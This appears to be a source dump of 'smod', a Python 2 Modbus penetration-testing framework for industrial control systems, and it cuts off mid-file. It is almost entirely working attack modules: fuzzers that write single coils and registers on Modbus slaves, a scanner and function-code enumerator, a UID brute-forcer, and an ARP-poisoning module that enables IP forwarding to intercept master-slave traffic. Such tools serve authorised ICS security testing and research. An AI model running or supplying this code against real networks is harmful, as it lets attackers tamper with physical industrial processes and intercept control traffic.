['@enddo'], 15 | 'Description': ("Fuzzing Read Holding Registers Function"), 16 | 17 | } 18 | options = { 19 | 'RHOSTS' :['' ,True ,'The target address range or CIDR identifier'], 20 | 'RPORT' :[502 ,False ,'The port number for modbus protocol'], 21 | 'UID' :[None ,True ,'Modbus Slave UID.'], 22 | 'StartAddr' :['0x0001' ,True ,'Start Address.'], 23 | 'Quantity' :['0x0002' ,True ,'Registers Values.'], 24 | 'Threads' :[1 ,False ,'The number of concurrent threads'], 25 | 'Output' :[True ,False ,'The stdout save in output directory'] 26 | } 27 | output = '' 28 | 29 | def exploit(self): 30 | 31 | moduleName = self.info['Name'] 32 | print bcolors.OKBLUE + '[+]' + bcolors.ENDC + ' Module ' + moduleName + ' Start' 33 | ips = list() 34 | for ip in ipcalc.Network(self.options['RHOSTS'][0]): 35 | ips.append(str(ip)) 36 | while ips: 37 | for i in range(int(self.options['Threads'][0])): 38 | if(len(ips) > 0): 39 | thread = threading.Thread(target=self.do,args=(ips.pop(0),)) 40 | thread.start() 41 | THREADS.append(thread) 42 | else: 43 | break 44 | for thread in THREADS: 45 | thread.join() 46 | if(self.options['Output'][0]): 47 | open(mainPath + '/Output/' + moduleName + '_' + self.options['RHOSTS'][0].replace('/','_') + '.txt','a').write('='*30 + '\n' + self.output + '\n\n') 48 | self.output = '' 49 | 50 | def printLine(self,str,color): 51 | self.output += str + '\n' 52 | if(str.find('[+]') != -1): 53 | print str.replace('[+]',color + '[+]' + bcolors.ENDC) 54 | elif(str.find('[-]') != -1): 55 | print str.replace('[-]',color + '[+]' + bcolors.ENDC) 56 | else: 57 | print str 58 | 59 | def do(self,ip): 60 | c = connectToTarget(ip,self.options['RPORT'][0]) 61 | if(c == None): 62 | self.printLine('[-] Modbus is not running on : ' + ip,bcolors.WARNING) 63 | return None 64 | self.printLine('[+] Connecting to ' + ip,bcolors.OKGREEN) 65 | ans = c.sr1(ModbusADU(transId=getTransId(),unitId=int(self.options['UID'][0]))/ModbusPDU03_Read_Holding_Registers(startAddr=int(self.options['StartAddr'][0],16),quantity=int(self.options['Quantity'][0],16)),timeout=timeout, verbose=0) 66 | ans = ModbusADU_Answer(str(ans)) 67 | self.printLine('[+] Response is :',bcolors.OKGREEN) 68 | ans.show() 69 | 70 | 71 | 72 | -------------------------------------------------------------------------------- /smod/Application/modules/modbus/function/readHoldingRegister.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/Application/modules/modbus/function/readHoldingRegister.pyc -------------------------------------------------------------------------------- /smod/Application/modules/modbus/function/readHoldingRegisterException.py: -------------------------------------------------------------------------------- 1 | import os 2 | import threading 3 | 4 | from System.Core.Global import * 5 | from System.Core.Colors import * 6 | from System.Core.Modbus import * 7 | from System.Lib import ipcalc 8 | 9 | class Module: 10 | 11 | 12 | info = { 13 | 'Name': 'Read Holding Registers Exception', 14 | 'Author': ['@enddo'], 15 | 'Description': ("Fuzzing Read Holding Registers Exception Function"), 16 | 17 | } 18 | options = { 19 | 'RHOSTS' :['' ,True ,'The target address range or CIDR identifier'], 20 | 'RPORT' :[502 ,False ,'The port number for modbus protocol'], 21 | 'UID' :['' ,True ,'Modbus Slave UID.'], 22 | 'Threads' :[1 ,False ,'The number of concurrent threads'], 23 | 'Output' :[True ,False ,'The stdout save in output directory'] 24 | } 25 | output = '' 26 | 27 | def exploit(self): 28 | 29 | moduleName = self.info['Name'] 30 | print bcolors.OKBLUE + '[+]' + bcolors.ENDC + ' Module ' + moduleName + ' Start' 31 | ips = list() 32 | for ip in ipcalc.Network(self.options['RHOSTS'][0]): 33 | ips.append(str(ip)) 34 | while ips: 35 | for i in range(int(self.options['Threads'][0])): 36 | if(len(ips) > 0): 37 | thread = threading.Thread(target=self.do,args=(ips.pop(0),)) 38 | thread.start() 39 | THREADS.append(thread) 40 | else: 41 | break 42 | for thread in THREADS: 43 | thread.join() 44 | if(self.options['Output'][0]): 45 | open(mainPath + '/Output/' + moduleName + '_' + self.options['RHOSTS'][0].replace('/','_') + '.txt','a').write('='*30 + '\n' + self.output + '\n\n') 46 | self.output = '' 47 | 48 | def printLine(self,str,color): 49 | self.output += str + '\n' 50 | if(str.find('[+]') != -1): 51 | print str.replace('[+]',color + '[+]' + bcolors.ENDC) 52 | elif(str.find('[-]') != -1): 53 | print str.replace('[-]',color + '[+]' + bcolors.ENDC) 54 | else: 55 | print str 56 | 57 | def do(self,ip): 58 | c = connectToTarget(ip,self.options['RPORT'][0]) 59 | if(c == None): 60 | self.printLine('[-] Modbus is not running on : ' + ip,bcolors.WARNING) 61 | return None 62 | self.printLine('[+] Connecting to ' + ip,bcolors.OKGREEN) 63 | ans = c.sr1(ModbusADU(transId=getTransId(),unitId=int(self.options['UID'][0]))/ModbusPDU03_Read_Holding_Registers_Exception(),timeout=timeout, verbose=0) 64 | ans = ModbusADU_Answer(str(ans)) 65 | self.printLine('[+] Response is :',bcolors.OKGREEN) 66 | ans.show() 67 | 68 | 69 | 70 | 71 | -------------------------------------------------------------------------------- /smod/Application/modules/modbus/function/readHoldingRegisterException.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/Application/modules/modbus/function/readHoldingRegisterException.pyc -------------------------------------------------------------------------------- /smod/Application/modules/modbus/function/readInputRegister.py: -------------------------------------------------------------------------------- 1 | import os 2 | import threading 3 | 4 | from System.Core.Global import * 5 | from System.Core.Colors import * 6 | from System.Core.Modbus import * 7 | from System.Lib import ipcalc 8 | 9 | class Module: 10 | 11 | 12 | info = { 13 | 'Name': 'Read Input Registers', 14 | 'Author': ['@enddo'], 15 | 'Description': ("Fuzzing Read Input Registers Function"), 16 | 17 | } 18 | options = { 19 | 'RHOSTS' :['' ,True ,'The target address range or CIDR identifier'], 20 | 'RPORT' :[502 ,False ,'The port number for modbus protocol'], 21 | 'UID' :[None ,True ,'Modbus Slave UID.'], 22 | 'StartAddr' :['0x0000' ,True ,'Start Address.'], 23 | 'Quantity' :['0x0001' ,True ,'Registers Values.'], 24 | 'Threads' :[1 ,False ,'The number of concurrent threads'], 25 | 'Output' :[True ,False ,'The stdout save in output directory'] 26 | } 27 | output = '' 28 | 29 | def exploit(self): 30 | 31 | moduleName = self.info['Name'] 32 | print bcolors.OKBLUE + '[+]' + bcolors.ENDC + ' Module ' + moduleName + ' Start' 33 | ips = list() 34 | for ip in ipcalc.Network(self.options['RHOSTS'][0]): 35 | ips.append(str(ip)) 36 | while ips: 37 | for i in range(int(self.options['Threads'][0])): 38 | if(len(ips) > 0): 39 | thread = threading.Thread(target=self.do,args=(ips.pop(0),)) 40 | thread.start() 41 | THREADS.append(thread) 42 | else: 43 | break 44 | for thread in THREADS: 45 | thread.join() 46 | if(self.options['Output'][0]): 47 | open(mainPath + '/Output/' + moduleName + '_' + self.options['RHOSTS'][0].replace('/','_') + '.txt','a').write('='*30 + '\n' + self.output + '\n\n') 48 | self.output = '' 49 | 50 | def printLine(self,str,color): 51 | self.output += str + '\n' 52 | if(str.find('[+]') != -1): 53 | print str.replace('[+]',color + '[+]' + bcolors.ENDC) 54 | elif(str.find('[-]') != -1): 55 | print str.replace('[-]',color + '[+]' + bcolors.ENDC) 56 | else: 57 | print str 58 | 59 | def do(self,ip): 60 | c = connectToTarget(ip,self.options['RPORT'][0]) 61 | if(c == None): 62 | self.printLine('[-] Modbus is not running on : ' + ip,bcolors.WARNING) 63 | return None 64 | self.printLine('[+] Connecting to ' + ip,bcolors.OKGREEN) 65 | ans = c.sr1(ModbusADU(transId=getTransId(),unitId=int(self.options['UID'][0]))/ModbusPDU04_Read_Input_Registers(startAddr=int(self.options['StartAddr'][0],16),quantity=int(self.options['Quantity'][0],16)),timeout=timeout, verbose=0) 66 | ans = ModbusADU_Answer(str(ans)) 67 | self.printLine('[+] Response is :',bcolors.OKGREEN) 68 | ans.show() 69 | 70 | 71 | 72 | -------------------------------------------------------------------------------- /smod/Application/modules/modbus/function/readInputRegister.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/Application/modules/modbus/function/readInputRegister.pyc -------------------------------------------------------------------------------- /smod/Application/modules/modbus/function/readInputRegisterException.py: -------------------------------------------------------------------------------- 1 | import os 2 | import threading 3 | 4 | from System.Core.Global import * 5 | from System.Core.Colors import * 6 | from System.Core.Modbus import * 7 | from System.Lib import ipcalc 8 | 9 | class Module: 10 | 11 | 12 | info = { 13 | 'Name': 'Read Input Registers Exception', 14 | 'Author': ['@enddo'], 15 | 'Description': ("Fuzzing Read Input Registers Exception Function"), 16 | 17 | } 18 | options = { 19 | 'RHOSTS' :['' ,True ,'The target address range or CIDR identifier'], 20 | 'RPORT' :[502 ,False ,'The port number for modbus protocol'], 21 | 'UID' :['' ,True ,'Modbus Slave UID.'], 22 | 'Threads' :[1 ,False ,'The number of concurrent threads'], 23 | 'Output' :[True ,False ,'The stdout save in output directory'] 24 | } 25 | output = '' 26 | 27 | def exploit(self): 28 | 29 | moduleName = self.info['Name'] 30 | print bcolors.OKBLUE + '[+]' + bcolors.ENDC + ' Module ' + moduleName + ' Start' 31 | ips = list() 32 | for ip in ipcalc.Network(self.options['RHOSTS'][0]): 33 | ips.append(str(ip)) 34 | while ips: 35 | for i in range(int(self.options['Threads'][0])): 36 | if(len(ips) > 0): 37 | thread = threading.Thread(target=self.do,args=(ips.pop(0),)) 38 | thread.start() 39 | THREADS.append(thread) 40 | else: 41 | break 42 | for thread in THREADS: 43 | thread.join() 44 | if(self.options['Output'][0]): 45 | open(mainPath + '/Output/' + moduleName + '_' + self.options['RHOSTS'][0].replace('/','_') + '.txt','a').write('='*30 + '\n' + self.output + '\n\n') 46 | self.output = '' 47 | 48 | def printLine(self,str,color): 49 | self.output += str + '\n' 50 | if(str.find('[+]') != -1): 51 | print str.replace('[+]',color + '[+]' + bcolors.ENDC) 52 | elif(str.find('[-]') != -1): 53 | print str.replace('[-]',color + '[+]' + bcolors.ENDC) 54 | else: 55 | print str 56 | 57 | def do(self,ip): 58 | c = connectToTarget(ip,self.options['RPORT'][0]) 59 | if(c == None): 60 | self.printLine('[-] Modbus is not running on : ' + ip,bcolors.WARNING) 61 | return None 62 | self.printLine('[+] Connecting to ' + ip,bcolors.OKGREEN) 63 | ans = c.sr1(ModbusADU(transId=getTransId(),unitId=int(self.options['UID'][0]))/ModbusPDU04_Read_Input_Registers_Exception(),timeout=timeout, verbose=0) 64 | ans = ModbusADU_Answer(str(ans)) 65 | self.printLine('[+] Response is :',bcolors.OKGREEN) 66 | ans.show() 67 | 68 | 69 | 70 | 71 | -------------------------------------------------------------------------------- /smod/Application/modules/modbus/function/readInputRegisterException.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/Application/modules/modbus/function/readInputRegisterException.pyc -------------------------------------------------------------------------------- /smod/Application/modules/modbus/function/writeSingleCoils.py: -------------------------------------------------------------------------------- 1 | import os 2 | import threading 3 | 4 | from System.Core.Global import * 5 | from System.Core.Colors import * 6 | from System.Core.Modbus import * 7 | from System.Lib import ipcalc 8 | 9 | class Module: 10 | 11 | 12 | info = { 13 | 'Name': 'Write Single Coil', 14 | 'Author': ['@enddo'], 15 | 'Description': ("Fuzzing Write Single Coil Function"), 16 | 17 | } 18 | options = { 19 | 'RHOSTS' :['' ,True ,'The target address range or CIDR identifier'], 20 | 'RPORT' :[502 ,False ,'The port number for modbus protocol'], 21 | 'UID' :[None ,True ,'Modbus Slave UID.'], 22 | 'OutputAddr' :['0x0000' ,True ,'Output Address from 0x0000 to 0xffff.'], 23 | 'OutputValue' :['0x0000' ,True ,'Value to write, 0x0000 == Off, 0xFF00 == On.'], 24 | 'Threads' :[1 ,False ,'The number of concurrent threads'], 25 | 'Output' :[True ,False ,'The stdout save in output directory'] 26 | } 27 | output = '' 28 | 29 | def exploit(self): 30 | 31 | moduleName = self.info['Name'] 32 | print bcolors.OKBLUE + '[+]' + bcolors.ENDC + ' Module ' + moduleName + ' Start' 33 | ips = list() 34 | for ip in ipcalc.Network(self.options['RHOSTS'][0]): 35 | ips.append(str(ip)) 36 | while ips: 37 | for i in range(int(self.options['Threads'][0])): 38 | if(len(ips) > 0): 39 | thread = threading.Thread(target=self.do,args=(ips.pop(0),)) 40 | thread.start() 41 | THREADS.append(thread) 42 | else: 43 | break 44 | for thread in THREADS: 45 | thread.join() 46 | if(self.options['Output'][0]): 47 | open(mainPath + '/Output/' + moduleName + '_' + self.options['RHOSTS'][0].replace('/','_') + '.txt','a').write('='*30 + '\n' + self.output + '\n\n') 48 | self.output = '' 49 | 50 | def printLine(self,str,color): 51 | self.output += str + '\n' 52 | if(str.find('[+]') != -1): 53 | print str.replace('[+]',color + '[+]' + bcolors.ENDC) 54 | elif(str.find('[-]') != -1): 55 | print str.replace('[-]',color + '[+]' + bcolors.ENDC) 56 | else: 57 | print str 58 | 59 | def do(self,ip): 60 | c = connectToTarget(ip,self.options['RPORT'][0]) 61 | if(c == None): 62 | self.printLine('[-] Modbus is not running on : ' + ip,bcolors.WARNING) 63 | return None 64 | self.printLine('[+] Connecting to ' + ip,bcolors.OKGREEN) 65 | ans = c.sr1(ModbusADU(transId=getTransId(),unitId=int(self.options['UID'][0]))/ModbusPDU05_Write_Single_Coil(outputAddr=int(self.options['OutputAddr'][0],16),outputValue=int(self.options['OutputValue'][0],16)),timeout=timeout, verbose=0) 66 | ans = ModbusADU_Answer(str(ans)) 67 | self.printLine('[+] Response is :',bcolors.OKGREEN) 68 | ans.show() 69 | 70 | 71 | 72 | -------------------------------------------------------------------------------- /smod/Application/modules/modbus/function/writeSingleCoils.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/Application/modules/modbus/function/writeSingleCoils.pyc -------------------------------------------------------------------------------- /smod/Application/modules/modbus/function/writeSingleRegister.py: -------------------------------------------------------------------------------- 1 | import os 2 | import threading 3 | 4 | from System.Core.Global import * 5 | from System.Core.Colors import * 6 | from System.Core.Modbus import * 7 | from System.Lib import ipcalc 8 | 9 | class Module: 10 | 11 | 12 | info = { 13 | 'Name': 'Write Single Register', 14 | 'Author': ['@enddo'], 15 | 'Description': ("Fuzzing Write Single Register Function"), 16 | 17 | } 18 | options = { 19 | 'RHOSTS' :['' ,True ,'The target address range or CIDR identifier'], 20 | 'RPORT' :[502 ,False ,'The port number for modbus protocol'], 21 | 'UID' :[None ,True ,'Modbus Slave UID.'], 22 | 'RegisterAddr' :['0x0000' ,True ,'Register Address.'], 23 | 'RegisterValue' :['0x0000' ,True ,'Register Value.'], 24 | 'Threads' :[1 ,False ,'The number of concurrent threads'], 25 | 'Output' :[True ,False ,'The stdout save in output directory'] 26 | } 27 | output = '' 28 | 29 | def exploit(self): 30 | 31 | moduleName = self.info['Name'] 32 | print bcolors.OKBLUE + '[+]' + bcolors.ENDC + ' Module ' + moduleName + ' Start' 33 | ips = list() 34 | for ip in ipcalc.Network(self.options['RHOSTS'][0]): 35 | ips.append(str(ip)) 36 | while ips: 37 | for i in range(int(self.options['Threads'][0])): 38 | if(len(ips) > 0): 39 | thread = threading.Thread(target=self.do,args=(ips.pop(0),)) 40 | thread.start() 41 | THREADS.append(thread) 42 | else: 43 | break 44 | for thread in THREADS: 45 | thread.join() 46 | if(self.options['Output'][0]): 47 | open(mainPath + '/Output/' + moduleName + '_' + self.options['RHOSTS'][0].replace('/','_') + '.txt','a').write('='*30 + '\n' + self.output + '\n\n') 48 | self.output = '' 49 | 50 | def printLine(self,str,color): 51 | self.output += str + '\n' 52 | if(str.find('[+]') != -1): 53 | print str.replace('[+]',color + '[+]' + bcolors.ENDC) 54 | elif(str.find('[-]') != -1): 55 | print str.replace('[-]',color + '[+]' + bcolors.ENDC) 56 | else: 57 | print str 58 | 59 | def do(self,ip): 60 | c = connectToTarget(ip,self.options['RPORT'][0]) 61 | if(c == None): 62 | self.printLine('[-] Modbus is not running on : ' + ip,bcolors.WARNING) 63 | return None 64 | self.printLine('[+] Connecting to ' + ip,bcolors.OKGREEN) 65 | ans = c.sr1(ModbusADU(transId=getTransId(),unitId=int(self.options['UID'][0]))/ModbusPDU06_Write_Single_Register(registerAddr=int(self.options['RegisterAddr'][0],16),registerValue=int(self.options['RegisterValue'][0],16)),timeout=timeout, verbose=0) 66 | ans = ModbusADU_Answer(str(ans)) 67 | self.printLine('[+] Response is :',bcolors.OKGREEN) 68 | ans.show() 69 | 70 | 71 | 72 | -------------------------------------------------------------------------------- /smod/Application/modules/modbus/function/writeSingleRegister.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/Application/modules/modbus/function/writeSingleRegister.pyc -------------------------------------------------------------------------------- /smod/Application/modules/modbus/scanner/arpWatcher.py: -------------------------------------------------------------------------------- 1 | import threading 2 | import os 3 | 4 | from System.Core.Global import * 5 | from System.Core.Colors import * 6 | from System.Lib.scapy.all import sniff,ARP 7 | 8 | class Module: 9 | 10 | 11 | info = { 12 | 'Name': 'ARP Watcher', 13 | 'Author': ['@enddo'], 14 | 'Description': ("ARP Watcher"), 15 | 16 | } 17 | options = { 18 | 'Output' :[True ,False ,'The stdout save in output directory'] 19 | } 20 | output = '' 21 | 22 | 23 | def exploit(self): 24 | 25 | moduleName = self.info['Name'] 26 | print bcolors.OKBLUE + '[+]' + bcolors.ENDC + ' Module ' + moduleName + ' Start' 27 | thread = threading.Thread(target=self.do,args=()) 28 | thread.start() 29 | thread.join() 30 | 31 | if(self.options['Output'][0]): 32 | open(mainPath + '/Output/' + moduleName + '_' + self.options['RHOSTS'][0].replace('/','_') + '.txt','a').write('='*30 + '\n' + self.output + '\n\n') 33 | self.output = '' 34 | 35 | def printLine(self,str,color): 36 | self.output += str + '\n' 37 | if(str.find('[+]') != -1): 38 | print str.replace('[+]',color + '[+]' + bcolors.ENDC) 39 | elif(str.find('[-]') != -1): 40 | print str.replace('[-]',color + '[+]' + bcolors.ENDC) 41 | else: 42 | print str 43 | 44 | def do(self): 45 | 46 | def watch_arp(pkt): 47 | self.printLine("[+] "+pkt.summary(),bcolors.OKGREEN) 48 | sniff(filter="arp",prn=watch_arp,store=0) 49 | 50 | -------------------------------------------------------------------------------- /smod/Application/modules/modbus/scanner/arpWatcher.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/Application/modules/modbus/scanner/arpWatcher.pyc -------------------------------------------------------------------------------- /smod/Application/modules/modbus/scanner/discover.py: -------------------------------------------------------------------------------- 1 | import os 2 | import threading 3 | 4 | from System.Core.Global import * 5 | from System.Core.Colors import * 6 | from System.Core import Modbus 7 | from System.Lib import ipcalc 8 | 9 | class Module: 10 | 11 | 12 | info = { 13 | 'Name': 'Modbus Discover', 14 | 'Author': ['@enddo'], 15 | 'Description': ("Check Modbus Protocols"), 16 | 17 | } 18 | options = { 19 | 'RHOSTS' :['' ,True ,'The target address range or CIDR identifier'], 20 | 'RPORT' :[502 ,False ,'The port number for modbus protocol'], 21 | 'Threads' :[1 ,False ,'The number of concurrent threads'], 22 | 'Output' :[True ,False ,'The stdout save in output directory'] 23 | } 24 | output = '' 25 | 26 | def exploit(self): 27 | 28 | moduleName = self.info['Name'] 29 | print bcolors.OKBLUE + '[+]' + bcolors.ENDC + ' Module ' + moduleName + ' Start' 30 | ips = list() 31 | for ip in ipcalc.Network(self.options['RHOSTS'][0]): 32 | ips.append(str(ip)) 33 | while ips: 34 | for i in range(int(self.options['Threads'][0])): 35 | if(len(ips) > 0): 36 | thread = threading.Thread(target=self.do,args=(ips.pop(0),)) 37 | thread.start() 38 | THREADS.append(thread) 39 | else: 40 | break 41 | for thread in THREADS: 42 | thread.join() 43 | if(self.options['Output'][0]): 44 | open(mainPath + '/Output/' + moduleName + '_' + self.options['RHOSTS'][0].replace('/','_') + '.txt','a').write('='*30 + '\n' + self.output + '\n\n') 45 | self.output = '' 46 | 47 | def printLine(self,str,color): 48 | self.output += str + '\n' 49 | if(str.find('[+]') != -1): 50 | print str.replace('[+]',color + '[+]' + bcolors.ENDC) 51 | elif(str.find('[-]') != -1): 52 | print str.replace('[-]',color + '[-]' + bcolors.ENDC) 53 | else: 54 | print str 55 | 56 | def do(self,ip): 57 | result = Modbus.connectToTarget(ip,self.options['RPORT'][0]) 58 | if (result != None): 59 | self.printLine('[+] Modbus is running on : ' + ip,bcolors.OKGREEN) 60 | 61 | else: 62 | self.printLine('[-] Modbus is not running on : ' + ip,bcolors.WARNING) 63 | 64 | -------------------------------------------------------------------------------- /smod/Application/modules/modbus/scanner/discover.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/Application/modules/modbus/scanner/discover.pyc -------------------------------------------------------------------------------- /smod/Application/modules/modbus/scanner/getfunc.py: -------------------------------------------------------------------------------- 1 | import os 2 | import threading 3 | 4 | from System.Core.Global import * 5 | from System.Core.Colors import * 6 | from System.Core.Modbus import * 7 | from System.Lib import ipcalc 8 | 9 | class Module: 10 | 11 | 12 | info = { 13 | 'Name': 'Get Function', 14 | 'Author': ['@enddo'], 15 | 'Description': ("Enumeration Function on Modbus"), 16 | 17 | } 18 | options = { 19 | 'RHOSTS' :['' ,True ,'The target address range or CIDR identifier'], 20 | 'RPORT' :[502 ,False ,'The port number for modbus protocol'], 21 | 'UID' :[None ,True ,'Modbus Slave UID.'], 22 | 'Threads' :[1 ,False ,'The number of concurrent threads'], 23 | 'Output' :[True ,False ,'The stdout save in output directory'] 24 | } 25 | output = '' 26 | 27 | def exploit(self): 28 | 29 | moduleName = self.info['Name'] 30 | print bcolors.OKBLUE + '[+]' + bcolors.ENDC + ' Module ' + moduleName + ' Start' 31 | ips = list() 32 | for ip in ipcalc.Network(self.options['RHOSTS'][0]): 33 | ips.append(str(ip)) 34 | while ips: 35 | for i in range(int(self.options['Threads'][0])): 36 | if(len(ips) > 0): 37 | thread = threading.Thread(target=self.do,args=(ips.pop(0),)) 38 | thread.start() 39 | THREADS.append(thread) 40 | else: 41 | break 42 | for thread in THREADS: 43 | thread.join() 44 | if(self.options['Output'][0]): 45 | open(mainPath + '/Output/' + moduleName + '_' + self.options['RHOSTS'][0].replace('/','_') + '.txt','a').write('='*30 + '\n' + self.output + '\n\n') 46 | self.output = '' 47 | 48 | def printLine(self,str,color): 49 | self.output += str + '\n' 50 | if(str.find('[+]') != -1): 51 | print str.replace('[+]',color + '[+]' + bcolors.ENDC) 52 | elif(str.find('[-]') != -1): 53 | print str.replace('[-]',color + '[+]' + bcolors.ENDC) 54 | else: 55 | print str 56 | 57 | def do(self,ip): 58 | c = connectToTarget(ip,self.options['RPORT'][0]) 59 | if(c == None): 60 | self.printLine('[-] Modbus is not running on : ' + ip,bcolors.WARNING) 61 | return None 62 | self.printLine('[+] Looking for supported function codes on ' + ip,bcolors.OKGREEN) 63 | for i in range(0,256): # Total of 127 (legal) function codes 64 | ans = c.sr1(ModbusADU(transId=getTransId(),unitId=int(self.options['UID'][0]))/ModbusPDU_Read_Generic(funcCode=i),timeout=timeout, verbose=0) 65 | 66 | # We are using the raw data format, because not all function 67 | # codes are supported out by this library. 68 | if ans: 69 | data = str(ans) 70 | data2 = data.encode('hex') 71 | returnCode = int(data2[14:16],16) 72 | exceptionCode = int(data2[17:18],16) 73 | 74 | if returnCode > 127 and exceptionCode == 0x01: 75 | # If return function code is > 128 --> error code 76 | #print "Function Code "+str(i)+" not supported." 77 | a=1 78 | else: 79 | if(function_code_name.get(i) != None): 80 | self.printLine("[+] Function Code "+str(i)+"("+function_code_name.get(i)+") is supported.",bcolors.OKGREEN) 81 | 82 | else: 83 | self.printLine("[+] Function Code "+str(i)+" is supported.",bcolors.OKGREEN) 84 | 85 | else: 86 | self.printLine("[+] Function Code "+str(i)+" probably supported.",bcolors.OKGREEN) 87 | 88 | 89 | 90 | 91 | -------------------------------------------------------------------------------- /smod/Application/modules/modbus/scanner/getfunc.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/Application/modules/modbus/scanner/getfunc.pyc -------------------------------------------------------------------------------- /smod/Application/modules/modbus/scanner/uid.py: -------------------------------------------------------------------------------- 1 | import os 2 | import threading 3 | 4 | from System.Core.Global import * 5 | from System.Core.Colors import * 6 | from System.Core.Modbus import * 7 | from System.Lib import ipcalc 8 | 9 | class Module: 10 | 11 | 12 | info = { 13 | 'Name': 'Brute Force UID', 14 | 'Author': ['@enddo'], 15 | 'Description': ("Brute Force UID"), 16 | 17 | } 18 | options = { 19 | 'RHOSTS' :['' ,True ,'The target address range or CIDR identifier'], 20 | 'RPORT' :[502 ,False ,'The port number for modbus protocol'], 21 | 'Function' :[1 ,False ,'Function code, Defualt:Read Coils.'], 22 | 'Threads' :[1 ,False ,'The number of concurrent threads'], 23 | 'Output' :[True ,False ,'The stdout save in output directory'] 24 | } 25 | output = '' 26 | 27 | def exploit(self): 28 | 29 | moduleName = self.info['Name'] 30 | print bcolors.OKBLUE + '[+]' + bcolors.ENDC + ' Module ' + moduleName + ' Start' 31 | ips = list() 32 | for ip in ipcalc.Network(self.options['RHOSTS'][0]): 33 | ips.append(str(ip)) 34 | while ips: 35 | for i in range(int(self.options['Threads'][0])): 36 | if(len(ips) > 0): 37 | thread = threading.Thread(target=self.do,args=(ips.pop(0),)) 38 | thread.start() 39 | THREADS.append(thread) 40 | else: 41 | break 42 | for thread in THREADS: 43 | thread.join() 44 | if(self.options['Output'][0]): 45 | open(mainPath + '/Output/' + moduleName + '_' + self.options['RHOSTS'][0].replace('/','_') + '.txt','a').write('='*30 + '\n' + self.output + '\n\n') 46 | self.output = '' 47 | 48 | def printLine(self,str,color): 49 | self.output += str + '\n' 50 | if(str.find('[+]') != -1): 51 | print str.replace('[+]',color + '[+]' + bcolors.ENDC) 52 | elif(str.find('[-]') != -1): 53 | print str.replace('[-]',color + '[+]' + bcolors.ENDC) 54 | else: 55 | print str 56 | 57 | def do(self,ip): 58 | self.printLine('[+] Start Brute Force UID on : ' + ip,bcolors.OKGREEN) 59 | for i in range(1,255): # Total of 255 (legal) uid 60 | c = connectToTarget(ip,self.options['RPORT'][0]) 61 | if(c == None): 62 | break 63 | try: 64 | 65 | c.sr1(ModbusADU(transId=getTransId(),unitId=i)/ModbusPDU_Read_Generic(funcCode=1),timeout=timeout, verbose=0) 66 | self.printLine('[+] UID on ' + ip + ' is : ' + str(i),bcolors.OKGREEN) 67 | closeConnectionToTarget(c) 68 | except Exception,e: 69 | closeConnectionToTarget(c) 70 | pass 71 | 72 | 73 | -------------------------------------------------------------------------------- /smod/Application/modules/modbus/scanner/uid.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/Application/modules/modbus/scanner/uid.pyc -------------------------------------------------------------------------------- /smod/Application/modules/modbus/sniff/arp.py: -------------------------------------------------------------------------------- 1 | import os 2 | import sys 3 | import signal 4 | import threading 5 | import random 6 | 7 | from System.Core.Global import * 8 | from System.Core.Colors import * 9 | from System.Core.Modbus import * 10 | from System.Lib import ipcalc 11 | 12 | 13 | 14 | down = False 15 | class Module: 16 | 17 | 18 | info = { 19 | 'Name': 'Arp Poisoning', 20 | 'Author': ['@enddo'], 21 | 'Description': ("Arp Poisoning"), 22 | 23 | } 24 | options = { 25 | 'Master' :['' ,True ,'The master IP address'], 26 | 'Slave' :['' ,True ,'The slave IP address'], 27 | 'Output' :[False ,False ,'The stdout save in output directory'] 28 | } 29 | output = '' 30 | 31 | def exploit(self): 32 | 33 | moduleName = self.info['Name'] 34 | print bcolors.OKBLUE + '[+]' + bcolors.ENDC + ' Module ' + moduleName + ' Start' 35 | self.do() 36 | if(self.options['Output'][0]): 37 | open(mainPath + '/Output/' + moduleName + '_' + self.options['Master'][0].replace('/','_') + '.txt','a').write('='*30 + '\n' + self.output + '\n\n') 38 | self.output = '' 39 | 40 | def printLine(self,str,color): 41 | self.output += str + '\n' 42 | if(str.find('[+]') != -1): 43 | print str.replace('[+]',color + '[+]' + bcolors.ENDC) 44 | elif(str.find('[-]') != -1): 45 | print str.replace('[-]',color + '[+]' + bcolors.ENDC) 46 | else: 47 | print str 48 | 49 | def do(self): 50 | def arp_callback(pkt): 51 | if ModbusADU in pkt: 52 | pkt.show() 53 | def poison_target(gatway_ip,gatway_mac,target_ip,target_mac): 54 | self.printLine('[+] Start Poisoning',bcolors.OKGREEN) 55 | with open('/proc/sys/net/ipv4/ip_forward', 'w') as ipf: 56 | ipf.write('1\n') 57 | while True: 58 | try: 59 | send(ARP(op=2,psrc=gatway_ip,pdst=target_ip,hwdst=target_mac)) 60 | send(ARP(op=2,psrc=target_ip,pdst=gatway_ip,hwdst=gatway_mac)) 61 | time.sleep(4) 62 | except: 63 | sys.exit(0) 64 | def restore_target(gatway_ip,gatway_mac,target_ip,target_mac): 65 | print "[+] Restore ARP Tables" 66 | send(ARP(op=2, pdst=gatway_ip, psrc=target_ip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=target_mac), count=3) 67 | send(ARP(op=2, pdst=target_ip, psrc=gatway_ip, hwdst="ff:ff:ff:ff:ff:ff", 